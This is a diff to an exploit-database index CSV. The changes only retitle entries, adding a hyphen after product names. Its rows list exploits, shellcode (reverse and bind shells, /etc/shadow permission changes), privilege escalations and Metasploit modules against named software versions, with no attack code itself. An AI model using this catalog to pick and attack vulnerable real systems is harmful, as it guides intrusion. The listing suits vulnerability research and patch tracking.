'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 @@ -32705,7 +32705,7 @@ id,file,description,date,author,platform,type,port 36272,platforms/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 -36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross-Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 +36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 @@ -32717,7 +32717,7 @@ id,file,description,date,author,platform,type,port 36285,platforms/windows/dos/36285.c,"Microsoft Windows TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 -36288,platforms/multiple/dos/36288.php,"Multiple Vendors libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 +36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 @@ -32728,7 +32728,7 @@ id,file,description,date,author,platform,type,port 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation",2011-11-09,IKCE,bsd,local,0 36297,platforms/php/webapps/36297.txt,"AShop - Open-Redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0 36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 -36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 +36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 @@ -32736,14 +32736,14 @@ id,file,description,date,author,platform,type,port 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 -36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0 +36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer Linux Kernel - Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 -36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 +36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 @@ -32788,12 +32788,12 @@ id,file,description,date,author,platform,type,port 36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - CSRF",2015-03-11,"Luis Santana",php,webapps,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 -36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,Metasploit,windows,remote,0 +36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free",2015-03-12,Metasploit,windows,remote,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 -36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 -36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 +36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 +36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Stored XSS",2015-03-13,"ITAS Team",php,webapps,0 @@ -32810,7 +32810,7 @@ id,file,description,date,author,platform,type,port 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 +36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0 @@ -32827,7 +32827,7 @@ id,file,description,date,author,platform,type,port 36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 +36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 @@ -32846,7 +32846,7 @@ id,file,description,date,author,platform,type,port 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 -36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex",2015-03-17,Metasploit,windows,remote,0 +36420,platforms/windows/remote/36420.rb,"Adobe Flash Player - PCRE Regex",2015-03-17,Metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST - (glibc gethostbyname) Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 36783,platforms/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC",2015-04-17,sajith,windows,dos,0 36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,Metasploit,multiple,remote,0 @@ -32855,7 +32855,7 @@ id,file,description,date,author,platform,type,port 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36425,platforms/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 -36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 +36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Local Privilege Escalation",2011-12-08,anonymous,linux,local,0 @@ -32930,19 +32930,19 @@ id,file,description,date,author,platform,type,port 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 - index.php Multiple Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 -36511,platforms/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 HTML Injection",2012-12-27,"Vulnerability Research Laboratory",hardware,remote,0 +36511,platforms/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",hardware,remote,0 36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Parameter Directory Traversal",2012-01-06,"Chokri B.A",php,webapps,0 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,windows,remote,0 -36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow",2012-01-06,demonalex,windows,remote,0 -36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross-Site Scripting and SQL Injection",2012-01-07,"BHG Security Center",asp,webapps,0 +36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Command Server Buffer Overflow",2012-01-06,demonalex,windows,remote,0 +36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 - Cross-Site Scripting and SQL Injection",2012-01-07,"BHG Security Center",asp,webapps,0 36516,platforms/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36520,platforms/php/webapps/36520.txt,"Berta CMS - File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 -36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 -36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 -36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36524,platforms/php/webapps/36524.txt,"ClipBucket 2.6 channels.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 36525,platforms/php/webapps/36525.txt,"ClipBucket 2.6 collections.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 36526,platforms/php/webapps/36526.txt,"ClipBucket 2.6 groups.php cat Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 @@ -32994,7 +32994,7 @@ id,file,description,date,author,platform,type,port 36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 Plugin - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Local Root Exploit",2015-04-13,mu-b,osx,local,0 -36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,Metasploit,windows,remote,0 +36579,platforms/windows/remote/36579.rb,"Adobe Flash Player - ByteArray With Workers Use-After-Free",2015-03-31,Metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS - 'index.php' Cross-Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps,0 @@ -33002,7 +33002,7 @@ id,file,description,date,author,platform,type,port 36584,platforms/php/webapps/36584.txt,"Vastal EzineShop - 'view_mags.php' SQL Injection",2012-01-19,Lazmania61,php,webapps,0 36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 -36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 Remote Buffer Overflow",2012-01-21,red-dragon,windows,remote,0 +36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 - Remote Buffer Overflow",2012-01-21,red-dragon,windows,remote,0 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component - 'controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 @@ -33040,7 +33040,7 @@ id,file,description,date,author,platform,type,port 36624,platforms/php/webapps/36624.txt,"Joomla! 'com_jesubmit' Component - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - index.php sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - index.php getParam() Function Multiple Parameter XSS",2012-01-25,"High-Tech Bridge SA",php,webapps,0 -36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 +36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component - Multiple SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 @@ -33092,15 +33092,15 @@ id,file,description,date,author,platform,type,port 36677,platforms/php/webapps/36677.txt,"WordPress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,Metasploit,windows,remote,0 -36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 +36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 - admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 +36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 @@ -33149,11 +33149,11 @@ id,file,description,date,author,platform,type,port 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Shell Upload",2015-04-13,"Claudio Viviani",php,webapps,0 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 -36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 +36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 - CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - splice() System Call Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 -36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 +36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 36745,platforms/osx/local/36745.rb,"Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33171,7 +33171,7 @@ id,file,description,date,author,platform,type,port 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 pfile/kommentar.php filecat Parameter XSS",2012-02-13,indoushka,php,webapps,0 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 -36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery",2012-02-13,MustLive,hardware,remote,0 +36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote,0 36768,platforms/php/webapps/36768.txt,"ProWiki - 'id' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 @@ -33208,7 +33208,7 @@ id,file,description,date,author,platform,type,port 36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 -36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 +36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Upload Plugin",2015-04-21,Metasploit,php,remote,80 36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Upload Plugin",2015-04-21,Metasploit,php,remote,80 36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Upload",2015-04-21,Metasploit,php,remote,80 @@ -33274,19 +33274,19 @@ id,file,description,date,author,platform,type,port 36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Parameter Cross-Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products - 'security.cgi' Cross-Site Request 